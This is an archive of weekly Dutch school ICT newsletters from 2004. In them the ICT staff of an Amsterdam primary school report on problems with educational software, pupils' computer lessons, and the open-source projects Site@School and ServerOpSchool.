Heeft iemand nog een suggestie wat te doen als software van grote educatieve uitgeverijen het niet doet? Je kan wel zeggen: neem andere software, maar er is ondertussen al zo veel tijd in gestoken, dan wil je ook dat het werkt.

Op de valreep komt bericht binnen van Malmberg, dat ze in België aan het testen zijn en er weer een nieuwe cd-rom naar ons onderweg is. En dan: "Linux wordt door ons niet ondersteund. We verwachten echter dat door de laatste aanpassingen Letterpret zal kunnen werken onder Linux, een garantie daarvoor is echter niet te geven."

Leesladder (Zwijsen)

Deze week kwamen we er achter, dat in het programma Leesladder (een remediërend leesprogramma) de resultaten van wat de leerlingen doen niet geregistreerd worden. We gebruiken dat programma nog niet zo veel, omdat er tot nu toe niemand verantwoordelijk was voor de inhoudelijke kant van het gebruik van het programma. i.e.: welk kind doet welke oefeningen van het programma.
Dus dat werd weer een mail naar een grote educatieve uitgeverij.

Tafel Totaal (Ambrasoft)

Groep 4 is nu ook ingevoerd in het programma en gaat ermee oefenen: de tafels van 2, 5 en 10 zijn het eerst aan bod.

Type programma in groep 8.

Idee: de periode na de Cito toets zou wel eens een prima tijd kunnen zijn om kinderen te leren blind typen.
Voor alle leerlingen is er een diskette gekopieerd zodat ze ook thuis kunnen oefenen (voor zover er thuis een computer beschikbaar is, natuurlijk). Ze hebben die mee om in de meivakantie te oefenen. We hebben ooit het plan gehad om oude computers daarvoor uit te lenen. Maar dat wordt teveel administratie.

Spam - opvoeding.

In groep 8 is een paar weken geleden aan de orde geweest hoe je moet voorkomen, dat je spam krijgt. Spam is ongewenste email. Er is uitgelegd aan de leerlingen, dat er mensen zijn die emailadressen verzamelen. Dat gebeurt door op het internet te zoeken naar email adressen die gepubliceerd zijn op websites, door kettingbrieven, etc. Ook zelf kun je voorkomen om emailadressen onnodig bekend te maken door email die je aan meerder geadresseerden verstuurt in het BCC-veld te zetten i.p.v. in het TO (= aan)-veld. BCC - blind carbon copy. Alle adressen die in bcc staan worden niet gezien door de andere ontvangers van de mail.

Nu gebeurt het weleens, dat wij -op de afdeling ICT- post krijgen die aan meerdere scholen is gestuurd. Je moet dan eerst door een A4-tje aan emailadressen heen scrollen voor je bij het bericht komt. Dus dubbel hinderlijk. Wij (Dirk en Karin) schrijven dan een bericht met "antwoord aan allen" met een boodschap erin, dat de afzender geen emailadressen moet rondstrooien. Zo ook deze week. Voor het eerst leverde dit een boos telefoontje op van de aanstichter. Met de vraag "wie is jullie directeur?". Wij zeiden: "Die is op vakantie".
Als de kat van huis is....
Wij zijn van mening, dat als op onze school aan de leerlingen geleerd wordt hoe om te gaan met email en internet wij ook het recht hebben een ander te wijzen op gevaren.
Meer info over spam en het voorkomen ervan op:

http://www.msn.nl/services/stopspam/default.asp?Ath=f
http://spam.pagina.nl
www.internetprivacy.nl/spam.html

Email project groep 4 en 7

De leerlingen van groep 4 hebben nu zo ongeveer allemaal hun tekening en begin van het verhaal naar groep 7 verstuurd. De eerste vervolgen op het verhaal zijn al teruggemaild. Het wordt gedaan door in Word te kiezen voor bestand>verzenden aan. Zo zien de leerlingen meteen hoe een bijlage mee gaat met de email.

Eén leerling uit groep 7 heeft alle emailadressen van de groepen op het image ingetikt in het adresboek van het email programma.

TECHNIEK

S@S

De nieuwsbrieven module is af en rijp voor de testers. Fred heeft weer een ongelofelijk mooi stuk werk geleverd.

Wil je meehelpen testen? Dat wordt door het S@S team zeer op prijs gesteld. Je kunt de module downloaden op:

http://rosaboekdrukker.net/phpBB2/viewtopic.php?t=215
Als je een bug vindt kun je 'm melden in 'Bugs found in modules'.
Voor degene die de meeste bugs vindt stelt de uitgever van de BIC een boekenbon beschikbaar.

We hadden Joost Dam van Viafrica op bezoek: http://www.viafrica.org . Zij zetten computers op Afrikaanse scholen neer die via een intranet verbonden zijn. Hij had zeer veel belangstelling voor S@S , zag het programma wel als bruikbaar op de scholen en zei ons onmiddellijk een vertaling in het Swahili toe. Daarnaast bood hij ook programmeerhulp aan.

SoS

De eerste concrete code begint vorm te krijgen.
Peter vordert met het backup programma dat 's nachts de backup van de ene naar de andere school verzorgt. Vannacht gaan we proberen onze firewall/web/mailserver naar Dirk's server te backuppen. Dit programma neemt een school veel werk uit handen. We hoeven niet meer wekelijks met een USB Harddisk langs de servers te gaan om ze te backuppen.
Voor de technici en in het kort: het prog maakt van opgegeven directoires een tgz, encrypt die met des en verzendt 'm via ssh/scp.
Checksum controle via md5 op de server van 'de andere school'. Bij incorrecte checksum een mail naar de beheerder. Die moet dan handmatig actie ondernemen.

Goede koniginnenach en vakantie,
Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-05-11 w20

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 20 - 2004 (14 mei)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS

Malmberg -Letterpret

Helaas is de volgende-zoveelste-neverending-story poging om Letterpret te installeren zonder beveiligingssleutel mislukt. We ontvingen weer een nieuwe installatie cd-rom. Weer foutmeldingen.
Het wordt tijd om een ander programma uit te kiezen.
Of hebben we al veel te lang met ons laten sollen?

Deadline Nascholingen

Op 21 mei moeten de aanvragen voor nascholingscursussen bij het ABC (onze schoolbegeleidingsdienst) binnen zijn.
Binnenkort gaan we ons buigen over de vraag: hoe kunnen we de computer effectiever inzetten als remediërend middel? Hoe zoeken we de software uit? Wie -binnen de school- is verantwoordelijk voor dat uitzoeken? Waar halen we de informatie vandaan? Onze schoolbegeleidingsdienst biedt op de valreep van het schooljaar een interessante curussenreeks aan op het gebied van zorg, maar die is niet meer in te plannen binnen onze schoolorganisatie. Dus: volgend schooljaar.

Gevaar?

Veel mails de afgelopen weken van de waarschuwingsdienst: http://www.waarschuwingsdienst.nl
Gaten in windows 2000 en XP moeten gedicht worden. Gelukkig werken wij met windows 98 en linux. Dus geen sasserworm-vrees. Wel veel meldingen van Norton AntiVirus van andere virussen.

Punt-uit. leuke spullen

Punt-uit levert allerlei begeleidend lesmateriaal voor wereldoriëntatie voor de groepen 6, 7 en 8. Vorige week kwam er heel mooi materiaal binnen over zoetwatervissen.
Nieuwe aflevering Vissen In samenwerking met de NVVS (Nederlandse Vereniging van Sportvissersfederaties) is een nieuwe Punt Uit-aflevering gemaakt over Vissen. Zie uitgebreide info hier: http://rosaboekdrukker.net/index.php?page=680&section=6

Meubilair

Tijdens een bouwvergadering kwam aan de orde, dat de nieuwe stoelen van het grote woonwarenhuis niet goed zijn voor de leerlingen. De wielen eronder op onze mooie gladde vloeren nodigen teveel uit tot spelen. We gaan nu op zoek naar krukken, zonder wielen, wel in hoogte verstelbaar en met een voetenring voor korte beentjes.
De nieuwe tafels bevallen uitstekend.

TECHNIEK

PRINTERSERVER

(bijdrage via de knop 'bijdrage' in de nieuwsbrievenmodule)
Maandagochtend deed de printerserver het niet meer. Er ontbrak een mouse driver. Vraag ons niet waarom. We hebben de file van een ander systeem gehaald en daarna draaide ie weer als vanouds. Gelukkkig zijn we na de vakantie van de printerservers af. Alles gaat dan via ServerOpSchool!

groeten,
Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-05-23 w21

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 22 - 2004 (28 mei)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

De Volgende Stap

Verschillende programma's draaien nu goed. Letterpret zonder netwerk, de Leesladders, Ik-Reken, Alles Telt, etc. etc. We merken dat veel gebruikers nog niet goed bekend zijn met de programma's. Het lijkt ons zo langzaqmerhand nodig om per programma 1 'handleidingkener/ster' aan te wijzen. Zij kent het programma, omdat ze er dagelijks mee werkt en kan mede-gebruikers helpen met vragen. Wie meldt zich aan voor de Leesladders etc.?

Letterpret

Vlak voor de Hemelvaartdagen stuurde Malmberg ons de mededeling dat de organisatie "QLICT" Letterpret aan de praat had gekregen. Dat bleek Letterpret voor groep 3 en 4 te zijn, niet de kleuterversie. Dirk heeft contact gezocht met QLICT. Zij waren zeer bereid hun kennis te delen. Echter, na wat proberen en uitwisselen hadden zij dezelfde problemen als wij: meerdere gebruikers kunnen niet met Letterpret werken. Er zitten dus nog steeds problemen in Letterpret.
Wij zijn het zat. We hebben LP standalone geinstalleerd op de computers van de kleutergroepen. We wachten wel af totdat er een normale versie verschijnt. We zijn het zat om als onbezoldigde testers te functioneren.
Lees verder bij "techniek" over Malmberg.

Alles Telt (kleuterversie)

In Alles telt moet worden aangegeven welke leerlingen op de afroeplijst komen. We begrijpen niet, dat testscholen niet in de gaten hadden, dat kleuters in een vrije situatie werken. Het zou moeten zijn, dat het programma zo is ingericht, dat er veel gemakkelijker een volgende leerling zijn ikoontje of naam aan kan klikken. Dat is bij Alles Telt heel ingewikkeld. De helpdesk meldt wel, dat suggesties ter verbetering van het programma aan de klantenservice kunnen woren doorgegeven. Dat klinkt hoop gevend.

Bosatlas

Wij hebben op onze computers de drie cd-roms van de bosatlas geïnstalleerd. Daar zijn we heel tevreden mee. Alleen voldoet het niet aan onze criteria voor software: er vindt geen registratie van wat de leerlingen doen plaats. Nu heeft Wolters Noordhoff een nieuwe netwerkversie op de markt gebracht. Na iedere oefening en quizronde krijgt de leerling een rapportje met een overzicht van zijn prestaties. Dat rapport wordt opgeslagen op het schoolnetwerk. In een speciale docentmodule kunnen topografische bouwstenen (namen van steden, rivieren, landen, enz) opgenomen of verwijderd worden uit het oefenbestand. Desgewenst kan de moeilijkheidsgraad worden aangepast. http://www.bosatlas.nl1juniorbos/index2.html
Omdat we huiverig zijn geworden voor netwerkversies van programma's, gaan we eerst op zoek naar een school waar het inderdaad ook werkt. Ook moeten er minstend 10 leerlingen tegelijkertijd probleemloos kunnen werken met het programma. Eerst zien, dan geloven/kopen.

Leesladder.

Het remediërend programma van Zwijsen werkt prima in ons netwerk. Ook de registratie van de leerlinggegevens is in orde. Dit in tegenstelling tot eerdere berichten. Wat was het probleem? Karin verdomde het om de handleiding te lezen. Ze schreeuwde: "Het moet gewoon zo  duidelijk zijn dat je zonder de handleiding te lezen met het programma kan werken!!".
Dirk (op rustige toon): "Er zijn programma's die zoveel kunnen dat dat niet zomaar te snappen is. Lees nu eens rustig de handleiding onder 'resutaten'' ofzo".
Een kwartier later Karin (gilt): "Ik heb het gevonden! Ik zie alle resultaten van "Yassine".
Dirk: "Heb ik me voor niks rot gezocht naar wat ik nu weer fout deed. Ik dacht dat ik gek was/werd. Bah!"
Vervolgens viel Karin voor Dirk op haar knieën en bood nederig haar excuses aan. Voortaan zou ze meteen een handleiding van a tot z lezen.
Toen waren we weer goede collega's.

groep 3 , 4 en 5

In groep 3 zijn de leerlingen versjes aan het overtikken. Ze zullen er een tekening bijmaken in Paint. In groep 5 is een taalles over leetekens en spaties en hoofdletters omgevormd tot een teksteverwerkingsopdracht. De opdracht is uitgeprint en in het taalschrift geplakt. Groep 4 is aan het laaste deel van het verhaal met groep 7 bezig.

Educat B

Het invoeren van de boeken in Educat vordert gestaag. We beraden ons nu over een geautomatiseerd uitleen systeem. Als alle boeken zijn ingevoerd, gaan we dan over op uitlenen per computer?

Hoogbegaafdheid.

Er was deze week een workshop over hoogbegaafdheid en ICT. Jammer dat de helft van de workshop ging over andere leermiddelen dan ICT middelen. Ook leuk, maar daardoor was het ICT gedeelte onderbelicht. Er waren veel programma's die te maken hebben met het vinden en leren van "weetjes" (encyclopediën en quizzen), terwijl je eigenlijk zoekt naar een programma, dat reeds aanwezige kennis en kunde van leerlingen gaat benutten of uitdaagt en dat het leggen van verbanden activeert. Voorbeelden van wel geschikte programma's: Simcity, Rollercoaster Tycoon en Zoombinies. Maar of die nu zo geschikt zijn om op school te laten spelen..........
Ook ontbrak een programma als Anne Frank.

Nieuwsbrief voor ouders

Regelmatig krijgen de leerlingen een nieuwsbrief mee naar huis. Sinds deze week is die nieuwsbrief te lezen op onze website. Ook kun je je er daar voor aanmelden. Dan krijg je hem per email thuisgestuurd. We hebben die nieuwsbrief de naam "Drukkertjes" gegeven. Maar dat is gebeurd zonder inspraak over de naam. Heeft iemand een sugeestie voor een leuke(re) naam?

TECHNIEK (S@S en SoS en netwerk)

Aanleveren fotoos

Weer een collega met een digitale fotocamera erbij. Het aantal foto's op de website groeit. Nu moeten we nog meer mensen leren met het programma om te gaan. We hebben gemerkt, dat het belangrijk is structuur aan te brengen in de inrichting van het album. We staan altijd open voor suggesties. "Hoe breng je orde en overzicht in foto albums?"

Statistieken

Er wordt bijgehouden hoeveel keer een pagina wordt aangeklikt. Het fotoalbum wint: 32.000 keer is dat al bezocht! ......

ServerOpSchool

Peter en Dirk (vooral Peter) zijn druk met de features voor het beheerprogramma. Het wordt echt iets voor Karin (zie boven), maar dan in de goede zin van het worod: Het beheer moet zo simpel zijn dat het zichzelf uitlegt. Dat maakt dat het er voor de heheerder simpel uitziet, maar achter de schermen is heel veel denkwerk verricht.

S@S

De nieuwsbrieven module is klaar en is op het forum beschikbaar voor testers en vertalers. Het manual is ook af en zit op http://wyxs.net/man2-1/mod_frm.htm.

Bezoek aan scholen

Karin, Peter en Dirk bezochten in het kader van 'ServerOpSchool' de Corantijn en de 10e Montessorischool. Ze wilden kijken hoe daar met het beheer van leerkrachten, leerlingen, documenten en programma's gedaan wordt. Op de Corantijn bekeken ze SchoolLAN en op de 10e Montessori Heutink. Zeer verhelderend en het leverde gedachten op voor het beheer in SoS.

In hetzelfde kader ontvingen we van 'Station to Station' hun documentatiemap met zeer uitgebreide informatie. Zeer verzorgd, zeer goed, maar niets voor ons. Het is een prima voorbeeld van de beschermende mediapedagogiek; heel veel afschermen voor leerlingen.

Goed weekend,
Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT (info apestaartje rosaboekdrukker.net)

2004-05-24 w22

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 23 - 2004 (4 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS - onze ICT-leerlijn

Letterpret - Leerlingen invoeren

Met de nieuwe installaties van letterpret zijn natuurlijk alle registratiegegevens verloren gegaan. Deze week zijn alle leerlingen opnieuw ingevoerd. Maar waar haalden we die icoontjes ook al weer vandaan?

Aardrijkskunde nieuwsbrief

Er is weer een aardrijkskunde nieuwsbrief binnen. We hebben hem voor jullie op onze site gezet. Boordevol ideeën voor Europa! http://rosaboekdrukker.net/index.php?section=10&page=682 

Vergadering.

Komende week staat voor een vergadering het punt ICT op de agenda: waar zijn we gebleven? Houden we ons aan de afspraken die we gemaakt hebben over wat we de leerlingen dit schooljaar op ICT gebied zullen bijbrengen. Hoe lukt het ons de computers te integreren in ons onderwijs.)
Op zoek naar extra rekenstof .  Eventueel een software programma?

Alles Telt

Problemen met de beurtenwisseling. Met een nieuw geïnstalleerde verbetering zouden de kinderen na een opgegeven aantal minuten  worden opgeroepen om aan de computer te werken met Alles Telt. Maar dit gebeurde niet. Dus de Helpdesk gebeld. Ditmaal de helpdesk van Thieme Meulenhoff. Ze zijn daar erg bereidwillig, maar hebben geen oplossing tot nu toe. Ze durfden hun eigen testopstelling -die goed werkte- niet te herinstalleren om ons probleem te reconstrueren. Ze vertelden wel dat een andere Amsterdamse school die met Station-to-Station werkt ook problemen heeft. Volgende week zullen we met elkaar in contact gebracht worden.
Het is toch wat: die dure netwerksoftware die maar problemen geeft. En weer lag het niet aan ons.

Kalender

Sinds een paar weken werkt de kalender op onze site. Neem eens een kijkje.

Techniek

S@S

Het is druk in het forum met suggesties, vragen van mensen die ergens niet uitkomen en wensen.

We hebben een grote aankondiging in Vives (populair blad voor ICT in 't basisonderwijs). Meteen gaan de statistieken voor het downloaden van het programma weer omhoog.
De agenda is bij ons in gebruik genomen door de directie en de coördinator onderbouw en de administratief medewerker.. Binnen een kwartier konden ze ermee werken.

ServerOpSchool

Deze week overleg met Timon over het logo voor de website. Dat wordt heel mooi. Verder diepe stilte want Peter is aan het coden. Janitor (het leerling, programma, etc beheersysteem) is nu uitgedacht en Peter is uitgedacht.

Wie weet raad?

Om onverklaarbare redenen  werkt de agenda niet op bepaalde computers. We kunnen het niet vinden. Instellingen van Internet Explorer? Iets in PHP?

De laatste ontdekking: een download manager maakt dat de agenda van de testserver wel werkt, maar die van de OBSRB niet.
Tips, suggesties, URL's etc. zijn zeer welkom.
(ondertussen is dit probleem gedeeltelijk opgelost. Het heeft te maken met verschillende URL’s die we op onze site gebruiken en COOKIES!!!)

Groet en goed weekend,
Karin,
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-06-05 w23

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 24 - 2004 (11 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

JURYLID GEVRAAGD VOOR LINUX PROGRAMMEERWEDSTRIJD (zie onder)

Onderwijs - ICT leerlijn

Digiwijzer-groep 6

Afgelopen maandag kwamen twee mensen van het ABC kijken hoe groep 6 met Digiwijzer werkt. De kinderen konden heel zelfstandig er aan werken en als er problemen waren werd er heel goed onderling overlegd. Een paar jongens zijn aan het hoofdstuk "wonen in een iglo" bezig. Als de opdrachten gedaan zijn mag er een spel gespeeld worden. Het is te vinden op http://www.nuspelen.nl/iglo.htm Probeer het eens!

ICT-toets

Voor de zomervakantie proberen we nog om de leerlingen van groep 4 t/m 8 een ICT toets af te nemen. Er is een beginnetje mee gemaakt en het valt niet mee. Het kost erg veel tijd per leerling (opdrachten lang). Bovendien zijn de toetsen aangeleverd in een .dot formaat - iets waar wij geen verstand van hebben. Voordat we alles in orde hadden in de mappen van de leerlingen is er verschrikkelijk gemopperd (zacht uitgedrukt). Het erge is, dat je denkt dat je alles in orde hebt, en als de leerlingen ermee gaan werken, blijkt er dan iets niet te kloppen. Dan wordt geprobeerd het "even snel" op te lossen. Dat lukt niet meteen. Gevolg: kinderen worden druk, omdat ze moeten wachten. Een andere opdracht is er niet zo snel. Organisatie loopt in de soep. Grote frustratie!!!!!

Onderwijsbegeleidingsdienst

Deze week hebben we het scholingsplan voor volgend jaar besproken. Een groot deel zal weer bestaan uit begeleiding van de ICT coördinator en het bezoeken van klassen om te zien wat er bijgesteld moet worden aan de afspraken.

Afspraak NSA

Volgende week is er een gesprek met Wouter die twee jaar geleden een ICT cursus voor ouders verzorgde. Hem is gevraagd om volgend jaar een aantal workshops na schooltijd voor kinderen te begeleiden. Te denken valt aan moeilijke opdrachten in Word en Paint. Aanleren van wat moeilijkere dingen, misschien wel foto’s bewerken.

Waarschuwingsdienst

Er komen regelmatig meldingen van de waarschuwingsdienst (www.waarschuwingsdienst.nl)
Deze week werd door hen aangeraden om (tijdelijk) een andere browser dan Internet Explorer te nemen!!
Ons lijkt dat een voortreffelijk idee. Nog beter is het om blijvend een andere browser te nemen, bijvoorbeeld Netscape of Mozilla.

Jurylid voor Linux Programmeerwedstrijd voorhet basisonderwijs.

Door het uitvallen van een jurylid zijn we op zoek naar een nieuw jurylid voor programmeerwedstrijd.
Heb je ervaring in het basisonderwijs en weet je waar goede programma's aan moeten voldoen, dan zoeken we jou.
Als je ook nog kunt op woensdag 30 juni vanaf 12 uur 's middags in Utrecht, reageer dan alsjeblieft. Reiskosten worden vergoed.

TECHNIEK

Nieuwsmodule

Sinds enige weken zijn we aan het experimenteren met het verzenden van deze BIC via onze nieuws module. De 9 personen die zich hebben aangemeld via de website (http://rosaboekdrukker.net/index.php?page=675&section=6) zullen vanaf heden de BIC niet meer via de gewone mail ontvangen.

Onderwijsbegeleidingsdienst

We ontvingen van het ABC tekstbestanden in .dot formaat. Ondingen als je niet de allerlaatste Word2004 tekstverwerker hebt geïnstalleerd op 40 computers. Ons idee:
Een onderwijsondersteunende organisatie hoort zich bij het aanleveren van materiaal te verdiepen in de software van de klant en daar het toegeleverde materiaal op af te stemmen.

Site@School

S@S en de commercie.
De belangstelling van commerciële aanbieders van Internet diensten voor scholen neemt toe. We hadden al een Nederlands bedrijf "B&C Netservice B.V.". Nu is er ook een Engels bedrijf "Meantime IT Ltd " dat S@S in haar dienstenpakket voor Engelse basisscholen aanbiedt. Ze vroegen keurig netjes om toestemming die ze uiteraard kregen, want S@S is open source software onder de General Public License. Zolang ze zich daaraan houden, mogen ze het gratis gebruiken en geld verdienen met de aanvullende diensten.S@S willen. Welkom bij de club.
Kort samengevat: Niet slecht voor een niche product dat al 10.000 downloads heeft.

Agenda

Vorige week rapporteerden we een agenda probleem. Het probleem is gelokaliseerd en aan de oplossing wordt gewerkt. Dirk test 'm nog op dit moment. Dank aan alle meedenkers!
Verder heeft de agenda bij ons nu 10 gebruikers. Dat gaat goed!

Nieuwe gebruikers

We ontvingen bericht van een ICT coördinator van 10 basisscholen in Tubbergen dat ze op S@S willen. Welkom bij de club.
Kort samengevat: Niet slecht voor een niche product dat al 10.000 downloads heeft.

ServerOpSchool

De stilte is oorverdovend. Dat komt doordat er hard gewerkt wordt.
Hier een update en samenvatting van zaken tot nu toe:
- De 'backup bij de buren' is af en werkt naar tevredenheid
- De leerlingen bakcup werkt ook en is nog arbeidsbesparender dan gedacht.- In 'Janitor' (het programma voor beher van gebruikers en programma's) kun je nu inloggen, gebruikers aanmaken/ wijzigen/ weggooien, groepen aanmaken en weggooien.
In Janitor zit nog het meeste werk.
- Webmail is bedacht. Het zit standaard in SoS, maar je kunt nu voor gebruikers en groepen kiezen of ze wel of niet mail hebben en of ze er wel of niet van buiten school bij kunnen.
- Het invoeren van leerlingen kan ook gedaan worden middels een bestand. Dat is super handig want nu kun je met een paar kunstgrepen je ESIS leerlingenbestand gebruiken om ServerOpSchool te 'vullen'.
Verder, en daar merk je niks van, achter de schermen van Janitor gebeurt een hoop. Bijvoorbeeld: In een keer wordt de hele file structuur opgezet.

Tot zover, goed weekend
Karin,
Dirk.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-06-18 w25

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 25 - 2004 (18 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS - ICT leerlijn

ICT toets.

Vorige week zijn we een beetje al te voortvarend aan de slag gegaan met het afnemen van de ICT toetsen. Het bleek nog in het pilot stadium en (Karin) mocht het uitproberen. Dus haar woede bij het mislopen had ze niet zo publiekelijk moeten ventileren. Haar excuses daarvoor.
Deze week zijn er uit verschillende klassen nog wel leerlingen mee verder gegaan, maar dan als test.
Een leerling van groep 5 heeft een aantal van de paintopdrachten uit de test zelf op de website van onze school gezet: kijk hier 

Letterpret.

We werken nu wel weer met Letterpret, maar dan in de stand-alone versie (dus niet draaiend in het netwerk) In alle klassen zijn de leerlingen opnieuw ingevoerd en alle kinderen hebben nu een nieuw icoontje gekregen. De overzichten voor de leerkrachten zijn nu klaar

ICT als naschoolse activiteit.

We hebben Wouter bereid gevonden om als pilot een cursusje ICT te doen als naschoolse activiteit (vanaf 13 september). Dat houdt in, dat er op 4 maandagen na schooltijd 8 leerlingen een uur lang extra technieken op de computer zullen leren. Als het bevalt, dan zullen we een nieuwe ronde organiseren.

Onderzoek Rekenweb

Een studente van de RUU (Rijksuniversiteit Utrecht) heeft een onderzoek gedaan hoe leerlingen reageren op wel/geen feedback in een spelletje van het Rekenweb (www.fi.uu.nl). We zullen de resultaten te horen krijgen. De kinderen waren in elk geval reuze enthousiast bij positieve opmerkingen. Een leerlinge die heel erg slecht is met rekenen, kreeg bij een goed antwoord de opmerking dat ze veel verstand had van rekenen. Ze zat te stralen!

Mededelingen pagina op een televisie.

In de hal hebben we nu een televisie staan waarop 'Mededelingen' zijn te zien. Als de mededelingen lang zijn rollen ze verticaal voorbij.
Als de mededelingen geweest zijn beginnen ze weer opnieuw enz. enz. (scrollen).
Het script daarvoor zit in S@S. Nodig hiervoor: televisie, computer met TV kaart.
We zetten de tv en de computer op een tijdklok zodat ie vanzelf aan en uitgaat en de computer start meteen op met de goede pagina in Internet Explorer.
Reuze handig, want je kunt nu de mededelingen vanuit huis updaten.

S@S

HTML
Het is wel handig als je een beetje HTML kent als je de website onderhoudt. Er zijn plekken in S@S waarbij je met een beetje html kennis meer mogelijkheden hebt om leuke dingen in de website te doen.
Voorbeeld: als je in de nieuwsmodule een bericht schrijft en je wilt door laten linken naar een ander pagina, moet je dat met een html-commando doen. Het is een beetje oefenen en in een schriftje bijhouden wat je gedaan hebt. Een simpel cursusje is  hier te vinden.

een goed weekend toegewenst
Karin
Dirk (die vanmorgen voor een weekje naar Frankrijk is vertrokken)

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-06-25 w26

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 25 - 2004 (18 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

deze is niet verschenen wegens drukte en vakantie van Dirk en adv van Karin

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-07-02 w27

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 27 - 2004 (2 juli)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

- vorige week was er geen BIC wegens overbelasting -

ICT leerlijn

Vrije Universiteit

Volgend schooljaar gaan we meedoen aan een project van de Vrije Universiteit over het gebruik en het zinvol toepassen van het internet door basisschoolleerlingen. Na de zomervakantie meer hierover.

KPN

Volgende week gaat de aanvraag voor de gratis internetaansluiting via de KPN en XS4ALL de deur uit. We moeten de kleine lettertjes nog even goed doornemen.

Linux programmeerwedstrijd.

Deze week namen Dirk en Karin zitting in de jury van een programmeerwedstrijd voor educatieve software. De overige leden bestaan uit een medewerker van het SLO en een redacteur van het COS-magazine. We bekeken in Utrecht zes programma’s die speciaal geschreven zijn om te kunnen draaien op linux computers. In de vakantie komt de jury nogmaals bijeen voor het definitieve oordeel.

S@S Nieuws

Site@School erobert Deutschland!

S@S kreeg een uitgebreide en zeer positieve bespreking in: http://lehrer-online.de/dyn/9.asp?url=411947.htm
De aanvragen voor een test account stromen binnen. We zijn apetrots. En het is ook fijn voor Jürgen, die zijn vertaalinspanningen gehonoreerd ziet.

Nieuwe Ikonen

Barry heeft de eerste voorzetten voor de nieuwe ikonen voor het S@S beheer geleverd. Denk daarbij aan de ikoontjes voor home, paginabeheer, modulebeheer, etc. Ze zien er fantastisch uit en doen recht aan het systeem: eenvoudig, helder  en in positieve zin 'schools'. Bedankt voor je inspanningen Barry. We kijken uit naar de volgende serie. Hopelijk kunnen we de volgende week trouwe lezers van de BIC een sneak-preview geven.

S@S gaat op de schop!

Eindelijk is, na een lange vergadering van het S@S team, besloten dat de inwendige directory structuur veranderd gaat worden. We willen de ingreep met zo min mogelijk nadelen voor de gebruikers laten verlopen en dat vereist nog heel wat denkwerk.

ServerOpSchool

Peter werkt keihard en het einde komt in zicht. 'Janitor', het programma dat leerlingen, groepen, werkgroepen en programma's beheert nadert zijn voltooiing. Het is een klein wondertje van vernuft.
Jos (Sterrewachter) kwam vlak voor sluitingstijd nog met een feature request die gelukkig nog realiseerbaar bleek. Kom daar eens om bij de software fabrikanten. De feature:  Mail gericht aan je email adres op school kun je laten doorsturen naar je vakantieadres (of en ander adres natuurlijk).

Groet en goed weekend,
Karin,
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-07-09 w28

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 28 - 2004 (9 juli)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Emailproject groep 4 en 7

Het is niet gelukt om alle verhalen op tijd gepubliceerd te krijgen. Dat zullen we na de vakantie wel rechtzetten.

Mag ik computeren?

Volgend schooljaar gaan we nog eens bespreken waar het computergebruik voor bedoeld is. Kinderen vinden meestal een ijsje lekkerder dan een appel. Zo ook op de computer: liever een spelletje dan een oefening. Net zoals je het eetgedrag van kinderen moet sturen, zo moet je ook het computergedrag sturen. Dus duidelijke opdrachten op de computer. Het beleid moet nog helderder! (hartekreet van een ict coördinator)

Jury Linuxmagazine

Volgende week, dus tijdens de zomervakantie hebben we nog een bijeenkomst van de jury voor de wedstrijd van het Linuxmagazine. Daarvoor gaan Karin en Dirk naar Utrecht. Er worden 6 programma’s beoordeeld.

KPN

De aanvraag voor de KPN aansluiting is helemaal klaar. Maar we doen hem de deur niet uit, want de levering is tussen de drie en zes weken na de aanvraag. Dat zou midden in de zomervakantie kunnen zijn. Onhandig.

Website

We zijn hard bezig geweest om onze website een nieuw uiterlijk te geven. Er is namelijk voor de papieren in de school (rapporten, brieven etc) een nieuw logo ontwikkeld. Nu is dat logo heel onhandig van vorm voor de website, dus we zitten wat te puzzelen. We wilden jullie alvast een sneakpreview geven, maar dat is iets te voorbarig. Dus helaas.....na de vakantie.

SERVEROPSCHOOL CD IS AF!

Na drie maanden  van zeer hard denken, code schrijven, vaak een ochtend- en avondvergadering per telefoon met Dirk, leverde Peter de ServerOpSchool CD af.
Dat deed hij in de vorm van een demonstratie voor Ronald (directeur OBSRB) en Karin (ICT coördinator OBSRB). zie hier
De demonstratie ging als volgt:
Er stonden een server en een client (Win98SE) klaar.
